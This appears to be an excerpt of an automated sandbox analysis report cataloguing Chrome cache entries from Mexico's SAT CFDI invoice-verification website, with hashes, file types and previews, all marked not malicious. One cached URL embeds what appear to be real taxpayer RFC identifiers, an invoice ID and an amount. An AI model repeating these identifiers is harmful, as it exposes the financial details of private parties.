                                                                          SHA-512:5AE015F23740249BBD49C5075ADBBEF3A3E0FA2304996D7D3364F8BD948BA143F7A667AB0EC4C5097DC59F6F220EE6A3E1BDEE0467125298FE50E4159EDE65A6
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Scripts/Jquery/FuncionesComunes.js
                                                                          Preview:.//Funciones que anula la escritura de caracteres que generar un error en el sumbit del UpdatePanel..function supressUpdatePanelRequestErrorCharacters(inputName) {.. document.querySelector(inputName).onkeydown = function (e) {.. if (e != undefined) {.. if (e.char == "<" || e.char == ">").. return false;.. }.. }..}

                                                                          Chrome Cache Entry: 194

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):171
                                                                          Entropy (8bit):4.632229786684446
                                                                          Encrypted:false
                                                                          SSDEEP:3:rdxkouVKQMB3tGFUvzTIAKYkRZtoAcMdN4e/AHGeffUDF/0UbKKHacWWGu:rzQ4QW3tSUbTIJYkRZ0Mf4OAS/0UNHXJ
                                                                          MD5:5A68B858AD41438915E67BEB2F42372D
                                                                          SHA1:8AC95A3FF704E47D3F37EF025C8BB569F8B81A03
                                                                          SHA-256:AE083B063AD2CF1BF6D05FF5C3E950CC586382152A9E1FF864E611D05AA94C53
                                                                          SHA-512:075CA75FEACCED083A7C3C023DB9DD8C390F8C05F3333F1D9DDB4310ADC8C5C25055EFFE14B2DC655D253642A7F75D41B9303B513C8B7B987DD1FA576072732F
                                                                          Malicious:false
                                                                          Preview:.<!DOCTYPE html>..<html>..<head>.. <title></title>...<meta charset="utf-8" />..</head>..<body>.. <h1>.. Recurso no encontrado.. </h1>..</body>..</html>..

                                                                          Chrome Cache Entry: 195

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (620), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16542
                                                                          Entropy (8bit):5.053943022082665
                                                                          Encrypted:false
                                                                          SSDEEP:192:mR09r0YIeAqHG1VpZOcELvE8BxLl5hHgRjAkUXEPeY:mR09r0YIgsDOcUE2dWBdv
                                                                          MD5:8C689C238D576DE08F24A30CA18252A3
                                                                          SHA1:53095F114BF5FC19D93EFC14B9BC2AFBD2588963
                                                                          SHA-256:7BD5CABC15D43C6008C40810E4F042DC82499BD900B26067281057C887E81E47
                                                                          SHA-512:A4D6391978C798267A380CEE26FDBA23C8384415D81CFD44AF2D3DD29EFF247EE5C21C5340A51CCED2818D7DE4774AD79ABF6009E75CD9022B57081587D9CDD8
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ==
                                                                          Preview:....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">..<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><meta http-equiv="PRAGMA" content="NO-CACHE" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /><meta property="gobmxhelper" content="no plugins" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="shortcut icon" href="Content/images/favicon.ico" type="image/vnd.microsoft.icon" /><link rel="icon" href="Content/images/favicon.ico" type="image/vnd.microsoft.icon" /><link href="Content/main.css" rel="stylesheet" /><link href="Content/satMain.css" rel="stylesheet" />.... <script src="/../Scripts/Jquery/jquery-3.1.1.js" type="text/javascript"></script>.. <script src="../Scripts/gobmx.js" type="text/javascript"></script>.. <script src="/../Scripts/Jquery/jquery.

                                                                          Chrome Cache Entry: 196

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):38088
                                                                          Entropy (8bit):3.8548461270116787
                                                                          Encrypted:false
                                                                          SSDEEP:384:n9i6YvqzqcpmSXW7g80WnWU2GjjgLjpSbuQpem+2xWAg3Amf2IKAtzmgUx:EuucygHWjjg/g6m+qWAg3N+haygU
                                                                          MD5:79FD77AADD6C0599E4E9D19312D92732
                                                                          SHA1:D29A2256D573672B86E34D2A83EB4CB7B4F9D996
                                                                          SHA-256:054738EC7D89D77EF5CFBEAF156ABBD925CF8819EE0104554FE318AC0709CE70
                                                                          SHA-512:745C8F0A025BA2BA21F549F75D942E809415696F3CECB273C3610C0C5214565B4931A946C41D4F89E43AD3FA1C4344E2AA8DFD8723F0F510D52483E3DEB815F2
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/images/pleca.svg
                                                                          Preview:<svg id="Capa_1" data-name="Capa 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 635.01 33"><defs><style>.cls-1{fill:#13322b;}.cls-2{fill:#235b4e;}.cls-3{fill:#d4c19c;}</style></defs><title>pleca plumaje_con fondo</title><rect class="cls-1" x="0.01" width="635" height="33"/><path class="cls-2" d="M124,27.28h-3.51a2,2,0,0,0-.82-.84l-3.76-1.21a.78.78,0,0,1-.39-.73,1,1,0,0,1,.53-.91l.54-.06c2.17.52,4.24,1,6.37.11.53-.26.67-.27.78-.23s.27.2.52.83A6.41,6.41,0,0,1,124,27.28ZM27.29,24.5,27,24.23a.89.89,0,0,0-.67.4A1.73,1.73,0,0,0,26,26.36l.51.92h2.7A15.6,15.6,0,0,0,27.29,24.5ZM162,27.28a7.92,7.92,0,0,0-2.24-3.22c-2.22-1.72-8.74-4-17.89-6.19A1.92,1.92,0,0,0,141,18a.86.86,0,0,0-.47.77,1.41,1.41,0,0,0,1.07,1,55.44,55.44,0,0,1,15.23,5.12,2.57,2.57,0,0,1,1.49,2.22c0,.05,0,.11,0,.16Zm3.54-2.46-.82,2.46h1.44c.16-.74.3-1.51.43-2.32,0-.55-.13-.85-.2-.86S165.84,24.3,165.56,24.82Zm-27-2.55A2.65,2.65,0,0,0,140,23.88l12.66,3.4h2.29l.14-.18-.12-.33A45.9,45.9,0,0,0,138.52,22.27ZM72.05,1.71c2-.59,4.52-1.1

                                                                          Chrome Cache Entry: 197

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 150x100, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):6577
                                                                          Entropy (8bit):7.629870704773201
                                                                          Encrypted:false
                                                                          SSDEEP:96:whIE5OG5GyhIp8oIv2KNOxpHcfnWo8PBTOF10ppcyFLV:WIwFGyi6r1OLHAnW9BTOFOpcgLV
                                                                          MD5:11C9B4041A56EBFE4BE74A033399B7B8
                                                                          SHA1:B32E46D5F9999447A25E2FC778EDA2BF174E19EC
                                                                          SHA-256:BB9AA454C101CB71B18FC1489AE38D065A98BE16348EBD5CAF7609BCDB1B8EF4
                                                                          SHA-512:BEA8B00B821F5806E141D5DD9DE942AA3636962994EEDC17BD2A52F9F380DCBBBEBDDC615506D8F409504B1A773902BCC7EACF4B541E1C71E0E946139C1244EC
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/GeneraCaptcha.aspx?Data=WkkRu7Gg71Owv9aFRtLb2zcz7YYuMSLYgaoDx4Z1qNI11wbpV+T7AWVv1+S9hjrvxcX2A0LXUzoI7CXrb2Voq5v7PXxtjVJ/aE2RxzOB9bY=
                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......d...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..kH...=.h..Y.F..v.H.9.)....e...`??O..t......e...`??O..t......e...`??O..t...W.d{;}>D...C.ga...9<.q6.3LM."._3?p+F....'.5.....K..N...t..n.....Eg..d.)l.I..?..>......Y....$:.E@..c8<{...Uh&.%.....9<..T.l.......P...7..|..j....}@..!..m.......{d'..Fb........6....GG|..>...<m...o...[........GO|.[+Z......h...s. .0>...^..+VX....H.g...]....u../.l~......m.=.E../.l~......

                                                                          Chrome Cache Entry: 198

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 309x42, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):14202
                                                                          Entropy (8bit):7.9399709052460326
                                                                          Encrypted:false
                                                                          SSDEEP:384:5rT1mLT/NSloH2GWZ40ponSNLKp0CU92+aUyyTcc:76CoHUq0pNWOCU92+aUyyTcc
                                                                          MD5:D6EBBB72744C1FCE8D75A15CBC326BFB
                                                                          SHA1:BEB8AE56562C046253E08D669143B1DAB54756C8
                                                                          SHA-256:CA03EA1F293B5E0BFE26FF4844E228907B537211DB34B523BC8F6ADFCF57E202
                                                                          SHA-512:A1D8AFE560B8169A98A314FC515398A3DD7BA7178BB30F28A96E19C9ED4BE58A7ABEDB91CF6291A397BF8F58C49F4AA42584007B30276D6C8B3C97B0C06753C7
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/images/Logo_SHCP_SAT-.jpg
                                                                          Preview:......JFIF.....d.d......Ducky.......d.....&Adobe.d................!......)...7x............................................................................................................................................*.5..................................................................................................P!2. 0"4..1#3$..........................!..1".AQ2#...Baq..R.$ Pb34u....%.......................!1..AQaq.2..."....Br# 0P.R..3.......................!1AQa.q.. P...0....................nil....lS...26P............-.=.x.z=h.:z..;i..B.........r1n.Y...:....4...s..9.f3......^.n|.[.[...!.A|Z........~M...Gn.*|!.J...b.s.......oGx.Zy.....C.Wj. 2.Y.....Zh.E..__...|}<.g7D..s...r..n......sokrw._....g.xN..@.5..=...4..r..(LwB.@.b.....C....._O.l_g...._.3...y...X.J..j.1lN.]>.+;4.o.N..m.n.....az.v..\..3...L...1..,..1...xV&$...s(.3..q...Wv.....W.O.....C.>.0.6Q.<|BR..,.>qL.....1.12.\....[.zm."....}..................................q......].......+I.].Q......*...4.'.y

                                                                          Chrome Cache Entry: 199

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):38088
                                                                          Entropy (8bit):3.8548461270116787
                                                                          Encrypted:false
                                                                          SSDEEP:384:n9i6YvqzqcpmSXW7g80WnWU2GjjgLjpSbuQpem+2xWAg3Amf2IKAtzmgUx:EuucygHWjjg/g6m+qWAg3N+haygU
                                                                          MD5:79FD77AADD6C0599E4E9D19312D92732
                                                                          SHA1:D29A2256D573672B86E34D2A83EB4CB7B4F9D996
                                                                          SHA-256:054738EC7D89D77EF5CFBEAF156ABBD925CF8819EE0104554FE318AC0709CE70
                                                                          SHA-512:745C8F0A025BA2BA21F549F75D942E809415696F3CECB273C3610C0C5214565B4931A946C41D4F89E43AD3FA1C4344E2AA8DFD8723F0F510D52483E3DEB815F2
                                                                          Malicious:false
                                                                          Preview:<svg id="Capa_1" data-name="Capa 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 635.01 33"><defs><style>.cls-1{fill:#13322b;}.cls-2{fill:#235b4e;}.cls-3{fill:#d4c19c;}</style></defs><title>pleca plumaje_con fondo</title><rect class="cls-1" x="0.01" width="635" height="33"/><path class="cls-2" d="M124,27.28h-3.51a2,2,0,0,0-.82-.84l-3.76-1.21a.78.78,0,0,1-.39-.73,1,1,0,0,1,.53-.91l.54-.06c2.17.52,4.24,1,6.37.11.53-.26.67-.27.78-.23s.27.2.52.83A6.41,6.41,0,0,1,124,27.28ZM27.29,24.5,27,24.23a.89.89,0,0,0-.67.4A1.73,1.73,0,0,0,26,26.36l.51.92h2.7A15.6,15.6,0,0,0,27.29,24.5ZM162,27.28a7.92,7.92,0,0,0-2.24-3.22c-2.22-1.72-8.74-4-17.89-6.19A1.92,1.92,0,0,0,141,18a.86.86,0,0,0-.47.77,1.41,1.41,0,0,0,1.07,1,55.44,55.44,0,0,1,15.23,5.12,2.57,2.57,0,0,1,1.49,2.22c0,.05,0,.11,0,.16Zm3.54-2.46-.82,2.46h1.44c.16-.74.3-1.51.43-2.32,0-.55-.13-.85-.2-.86S165.84,24.3,165.56,24.82Zm-27-2.55A2.65,2.65,0,0,0,140,23.88l12.66,3.4h2.29l.14-.18-.12-.33A45.9,45.9,0,0,0,138.52,22.27ZM72.05,1.71c2-.59,4.52-1.1

                                                                          Chrome Cache Entry: 200

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 150x100, components 3
                                                                          Category:dropped
                                                                          Size (bytes):7191
                                                                          Entropy (8bit):7.734902604458429
                                                                          Encrypted:false
                                                                          SSDEEP:192:WIfNvWF1b1b1b1b1i1PXQYv1v1v1T9M1v1XhCu0wl1b1mFABTOl0cgLV:HIF1b1b1b1b1i1YYv1v1v1T9M1v1XpzZ
                                                                          MD5:353DE18D16F4425143ABCF2B0DDBEBB9
                                                                          SHA1:A69FBA44A6A4992F0A302E32FDB77A2914663523
                                                                          SHA-256:CD78875073F93CB48ACAA036407A030B46BCDA838E39F39A82CDBCC56D37708C
                                                                          SHA-512:E4D5D6F2929769CD5B91FA8923F1E71F0A791750A1C9CB993C180DD7DFBC2662CF0EFB8D74C39F10E26687F2A56F3D0D6C99230B9ACF894E9F566BD906E4DF6B
                                                                          Malicious:false
                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......d...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....8.Y..-.@.c\.....O?.....q.L...X0./.rOBrpq...a...........3...x..../{ym.>Z....9?O..RA%...?s.j>......g.}.r;.K 2...!d.....G.<..8.....7.<..b..........N..;......T..10..B.6.|}...).|...].Px..........<......;.......#...P..V........=..I..-o..&....%... .p.t...*B.\v.{.Go'.b_..l..gw...9.@...y.\...sj%..n.c$.p..:..U.m..{..h.........~.c).g.^.1.r...6.3..G......F.....

                                                                          Chrome Cache Entry: 201

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):115641
                                                                          Entropy (8bit):4.224767269103439
                                                                          Encrypted:false
                                                                          SSDEEP:1536:SSA8LesrOcTueN2RmiOUSWSSTMTaAt9vqJ6MSpyICA5+moiX1X:0HekrUCE
                                                                          MD5:0DE5B16C621032944EDACEC636341764
                                                                          SHA1:3A843BDC90891B3889DBD9D6362FE5231E0E1A20
                                                                          SHA-256:8DB80AAC32446005454902A9BDA741717C00CF545D72FF2F3AB174B55A6466D2
                                                                          SHA-512:D7F5E5CA0756EAABB83BBB5BAF30A6516D084E765B0C6693921BF49895A043B28B0B9FAC1D1352722146A5C7BD15D62099D3E44DAFE3A9C4E11A84FE8AA35ACA
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/images/logofooter.svg
                                                                          Preview:<svg id="Capa_1" data-name="Capa 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 772.07 227.24"><defs><style>.cls-1{fill:#fff;}</style></defs><title>Logo_794x265</title><path class="cls-1" d="M205.49,124.74a49.21,49.21,0,0,0-3.74-15.61,1.61,1.61,0,0,0-1.39-.59,1,1,0,0,0-.77.28v.62A54.75,54.75,0,0,1,203,123.86c.31,2.57-.15,5.72-1.45,9.89a32.84,32.84,0,0,0-.1,7.67c0,1-.51,1.51-.95,1.51s-.94-.4-1-1.59c-.23-2.91-.31-5.43-.38-7.64l0-.24a48.12,48.12,0,0,0-1-10.59c-.4-1.73-2.08-4.3-5-7.65a21.62,21.62,0,0,1-2.74-5.91c-.14-.44-.24-.91-.37-1.44s-.31-1.18-.48-1.73l-1-3.27a.76.76,0,0,0-.66-.32,1.9,1.9,0,0,0-1.39.73,1.25,1.25,0,0,0-.24,1l2.78,9.46a17.4,17.4,0,0,0,3.41,4.86l.07.07c.77.87,1.46,1.67,2.12,2.54a8.23,8.23,0,0,1,1.59,4.48c.46,3.23.83,7.84,1.18,14.5l1.88,9.55a31.84,31.84,0,0,1-.4,10.61c-.11,1.42.08,1.88.23,2l.2.06c.16,0,.64-.11,1.64-1.08,2.66-3.23,2.51-14.18,2.39-23a44.07,44.07,0,0,1,1.26-7.14,22.09,22.09,0,0,0,.92-6.48" transform="translate(-10.96 -19.45)"/><path class="cls-1" d="M196,

                                                                          Chrome Cache Entry: 202

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):115641
                                                                          Entropy (8bit):4.224767269103439
                                                                          Encrypted:false
                                                                          SSDEEP:1536:SSA8LesrOcTueN2RmiOUSWSSTMTaAt9vqJ6MSpyICA5+moiX1X:0HekrUCE
                                                                          MD5:0DE5B16C621032944EDACEC636341764
                                                                          SHA1:3A843BDC90891B3889DBD9D6362FE5231E0E1A20
                                                                          SHA-256:8DB80AAC32446005454902A9BDA741717C00CF545D72FF2F3AB174B55A6466D2
                                                                          SHA-512:D7F5E5CA0756EAABB83BBB5BAF30A6516D084E765B0C6693921BF49895A043B28B0B9FAC1D1352722146A5C7BD15D62099D3E44DAFE3A9C4E11A84FE8AA35ACA
                                                                          Malicious:false
                                                                          Preview:<svg id="Capa_1" data-name="Capa 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 772.07 227.24"><defs><style>.cls-1{fill:#fff;}</style></defs><title>Logo_794x265</title><path class="cls-1" d="M205.49,124.74a49.21,49.21,0,0,0-3.74-15.61,1.61,1.61,0,0,0-1.39-.59,1,1,0,0,0-.77.28v.62A54.75,54.75,0,0,1,203,123.86c.31,2.57-.15,5.72-1.45,9.89a32.84,32.84,0,0,0-.1,7.67c0,1-.51,1.51-.95,1.51s-.94-.4-1-1.59c-.23-2.91-.31-5.43-.38-7.64l0-.24a48.12,48.12,0,0,0-1-10.59c-.4-1.73-2.08-4.3-5-7.65a21.62,21.62,0,0,1-2.74-5.91c-.14-.44-.24-.91-.37-1.44s-.31-1.18-.48-1.73l-1-3.27a.76.76,0,0,0-.66-.32,1.9,1.9,0,0,0-1.39.73,1.25,1.25,0,0,0-.24,1l2.78,9.46a17.4,17.4,0,0,0,3.41,4.86l.07.07c.77.87,1.46,1.67,2.12,2.54a8.23,8.23,0,0,1,1.59,4.48c.46,3.23.83,7.84,1.18,14.5l1.88,9.55a31.84,31.84,0,0,1-.4,10.61c-.11,1.42.08,1.88.23,2l.2.06c.16,0,.64-.11,1.64-1.08,2.66-3.23,2.51-14.18,2.39-23a44.07,44.07,0,0,1,1.26-7.14,22.09,22.09,0,0,0,.92-6.48" transform="translate(-10.96 -19.45)"/><path class="cls-1" d="M196,

                                                                          Chrome Cache Entry: 203

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):95811
                                                                          Entropy (8bit):4.2320428591574135
                                                                          Encrypted:false
                                                                          SSDEEP:1536:HRR288TnjN+OErlJRd3zOnJcBhea09vZtlUJkqXF2TW:HMqFd3ywCtqN
                                                                          MD5:D54221941E772358A959861D3B4A4A87
                                                                          SHA1:F491DF9C1F822AD6E1528DEB4B7D6E5C1BF8F37E
                                                                          SHA-256:3383DA948D673BAB3636127152D3D8D5212D85BC553537F01554B2A829C17936
                                                                          SHA-512:BD378B8EBE2285B332B41DE41A61EA48043C0841C369CB835C28DB24E04289AA418F54DBB39F7F14D03F55225ADD7D952636F23FCBA9846A575361A4FBDF50C6
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/images/logoheader.svg
                                                                          Preview:<svg id="Capa_1" data-name="Capa 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 123.55 36.37"><defs><style>.cls-1{fill:#dac6a1;}.cls-2{fill:#fff;}</style></defs><title>Logo_128x50</title><path class="cls-1" d="M33.65,23.53a7.88,7.88,0,0,0-.6-2.5.28.28,0,0,0-.22-.09.17.17,0,0,0-.13,0v.09a8.69,8.69,0,0,1,.55,2.31A3.81,3.81,0,0,1,33,25a5.07,5.07,0,0,0,0,1.23c0,.17-.09.24-.16.24s-.15-.06-.16-.25c0-.47,0-.87-.06-1.22v0a7.88,7.88,0,0,0-.17-1.7A3.57,3.57,0,0,0,31.67,22a3.5,3.5,0,0,1-.44-1c0-.07,0-.14-.06-.23s-.05-.19-.08-.27L30.93,20a.13.13,0,0,0-.11-.05.29.29,0,0,0-.22.12.24.24,0,0,0,0,.16L31,21.77a2.89,2.89,0,0,0,.54.78h0a4.1,4.1,0,0,1,.34.41,1.26,1.26,0,0,1,.26.71c.07.52.13,1.26.19,2.32l.3,1.53a5,5,0,0,1-.07,1.7c0,.23,0,.3,0,.32h0s.11,0,.27-.17c.42-.52.4-2.27.38-3.68a6.53,6.53,0,0,1,.2-1.14,3.49,3.49,0,0,0,.15-1" transform="translate(-2.52 -6.68)"/><path class="cls-1" d="M32.12,21.23l0-.27a.34.34,0,0,0-.05-.14.5.5,0,0,0-.3-.24h-.13s0,0,0,.06a2.4,2.4,0,0,0,.72,1.44h.06s0-.05,0-.15l-.19-

                                                                          Chrome Cache Entry: 204

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):52
                                                                          Entropy (8bit):4.279780045430952
                                                                          Encrypted:false
                                                                          SSDEEP:3:O6nCkoqS5XkiCnL4yY:OLp5XrosL
                                                                          MD5:7020867540E3A0AA53DC9C7598D8A222
                                                                          SHA1:88BAC34A377017D940EB3AE6A60AA79E8DFFEBD8
                                                                          SHA-256:CC69F954DB4959643C953BFF7E4997E14CC6131A733AB955E51AA73E3B77A2FC
                                                                          SHA-512:D803C4043612459660421FF05C0F57B81B13039926C466538F707D464D8BA2F24FAEC4F154FDA601DED61155AC82ED325AFABD68B5224F8EF45C7FB1187A95D6
                                                                          Malicious:false
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSJQmNeWkOjolr4RIFDY4EELYSBQ17I2IrEgUNeUa0xhIFDe2yIUw=?alt=proto
                                                                          Preview:CiQKBw2OBBC2GgAKBw17I2IrGgAKBw15RrTGGgAKBw3tsiFMGgA=

                                                                          Chrome Cache Entry: 205

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 165 x 20, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):2323
                                                                          Entropy (8bit):7.878862786676429
                                                                          Encrypted:false
                                                                          SSDEEP:48:K+rGZXPs95Pfr1LZoJ/HHz+DCr+JosIuKFgDkF+XgQ0HM:fMPsbPtZoRiDivuKF+mI0HM
                                                                          MD5:34A1FF43589273CA202E1FA5BC6D110B
                                                                          SHA1:D257A59FDA9CB767B2089381932484F90D661D9E
                                                                          SHA-256:90EB6BE376630182DC8548CF0D827BC840B381A799E89ABCC3A404B6DAE890BB
                                                                          SHA-512:32782B75338940899E6E6BD4E5BF34A3316814187B49D476F382788A06083361D91E2AA751BAAEF1DBCE9C587F05AC1D2C697E891EE3EADA616A6D3500CC69D3
                                                                          Malicious:false
                                                                          Preview:.PNG........IHDR....................sRGB.........IDATh..k.]U..;..!......\*.%.C..h.W.1...KbH`."T..".m...bb.....3<.....Q..O.F.S.F...wx..`QDa..O.:......{..t%.Yk.._k.{.:..s.%K....0.../..qOg<...0.!i..3....&.w......Q.[`....^|.8.m...)...........h..+u...\T....o*...>.p.....^...7..0..kx............$...!<.P.%..S.......uJ.9..~..&.......X...Z..jp.88...^...$..G....).....O.}.&..rF...S.n.....{..1..x.<...Z..m.[./j.6..0..P)..X.O...w.I.7......&.8p?x........\j......o...&....>.(W..Xj1.../...1.E.oY..?aW5..\..`p...W.,...-.N.T..`........_...^.jH...L...}6Z....@w......W.]t...7..R.....gC.t...o..S...'..O..jZ.....j....Df....bm..y.0.&..G....D.t|...a].G.70.qzdd.Y.{5x.L.....w..z.K...uWwW...f...`......O...........L...>..s.........\.>(.KL..........C....].....-...Ss.IAP..k.z[..z,..m..V..M.....1.........9p>..G.......#.^v$j.R...j.m.. ..E..x?X.l.Y.....K.0.M....~or;.W.w".6!..p|$.....@w......`4.c.....O.hM....&2...-.Z......B...........ljM7.+...I.h.*.;Q%.....>..<X.v....{.?Vc.t......#.).G

                                                                          Chrome Cache Entry: 206

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 24 x 24
                                                                          Category:dropped
                                                                          Size (bytes):2545
                                                                          Entropy (8bit):7.155350736412842
                                                                          Encrypted:false
                                                                          SSDEEP:48:HXvqZ5vmZv9Cd9c567nXCp1MWBXpSP+km6dAuzvdEKP:H/YJndGU7nyp1RXplkHdAiv6
                                                                          MD5:E6E64CCD6DF5F0F9AF773B9B11BC47CB
                                                                          SHA1:08E1943408BDC906A9E18F2A1132A96638661869
                                                                          SHA-256:1AA7AE8DCAF973282D89CACA5596EF55BA25552E196B1FE666945B81391B3C3C
                                                                          SHA-512:0068F7D631A2A3EAE7CED9C382E5092BEC191321A72528266EF090495B78C0B691EC690CEC060DC143DD644934B48B414F9FFAB2BE6A9F4B2DADA1B6BFC3E6C4
                                                                          Malicious:false
                                                                          Preview:GIF89a..........???....................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..*........t...........~."...ds]......)t...-"...i;H>.n.Qg]_*......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx*.kK.).....?K...............$..."....*.......K.....W......x..?.G...#.W....n.h.K,.....+.....*!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e*.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..

                                                                          Chrome Cache Entry: 207

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (39257), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):40326
                                                                          Entropy (8bit):5.245555585297941
                                                                          Encrypted:false
                                                                          SSDEEP:384:bvrc3TrJ1vMZCKZ4pLRy6DkfDLcbTzcXanT2rxb64aKQr1vySAwBaPUge6ydE:bTaYB4Hy7mTzcaTKStrwSAwBaPUTdE
                                                                          MD5:DA9DC1C32E89C02FC1E9EEB7E5AAB91E
                                                                          SHA1:3EFB110EFA6068CE6B586A67F87DA5125310BC30
                                                                          SHA-256:398CDF1B27EF247E5BC77805F266BB441E60355463FC3D1776F41AAE58B08CF1
                                                                          SHA-512:D4730EBC4CA62624B8300E292F27FD79D42A9277E409545DF7DC916189ED9DF13E46FAA37E3924B85A7C7EA8C76BF65A05ECA69B4029B550430536EC6DF8552A
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/ScriptResource.axd?d=Jw6tUGWnA15YEa3ai3FadEjFAMI9YAbkwgRdmvOEC-2nDfSRk7L8Fx1WTdJIhWLMlhQstu533kTk581SGHR8YsV49ndLNmXon2KOXVbLCgvlJBd5JAQoJFcHor4b5mLoG-zPkCosojdb3IC8VA9On523o281&t=2e7d0aca
